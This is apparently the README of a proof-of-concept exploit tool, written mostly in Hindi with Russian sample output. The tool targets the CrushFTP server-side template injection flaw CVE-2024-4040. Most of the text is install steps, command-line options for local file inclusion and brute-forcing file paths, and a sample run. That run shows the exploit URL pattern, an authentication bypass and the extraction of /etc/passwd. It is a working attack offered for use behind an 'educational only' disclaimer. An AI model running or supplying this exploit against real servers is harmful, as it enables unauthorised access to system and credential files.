
CVE-2024-4040 के लिए एक PoC है जो CrushFTP में SSTI कमजोरी का शोषण करने वाला टूल
GenCrushSSTIExploit एक PoC शोषण उपकरण है जो CrushFTP CVE-2024-4040 में SSTI (सर्वर-साइड टेम्पलेट इंजेक्शन) कमजोरी को लक्षित करता है। यह उपकरण केवल शैक्षिक और नैतिक हैकिंग उद्देश्यों के लिए इस कमजोरी का शोषण करने का प्रदर्शन करता है।
rich का उपयोग करता है।⚠️ इस उपकरण का जिम्मेदारी से उपयोग करें! यह केवल अनुसंधान और शैक्षिक उद्देश्यों के लिए है। लेखक इस उपकरण के दुरुपयोग या इससे होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं है।
pip (Python पैकेज इंस्टॉलर)git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit
pip install -r requirements.txt
python GenCrushSSTIExploit.py -t <TARGET_URL>
-t / --target: कमजोर CrushFTP सर्वर का लक्ष्य URL निर्दिष्ट करता है।-l / --lfi: स्थानीय फ़ाइल समावेशन। निकालने के लिए फ़ाइल निर्दिष्ट करता है।-w / --wordlist: फ़ाइल पथों की ब्रूट-फोर्सिंग के लिए एक शब्दसूची निर्दिष्ट करता है।python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------
[*] Подключение к ServerSessionAJAX...
[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987
[*] Попытка эксплуатации уязвимости SSTI...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a
[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com
[*] Попытка обхода аутентификации...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a
[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...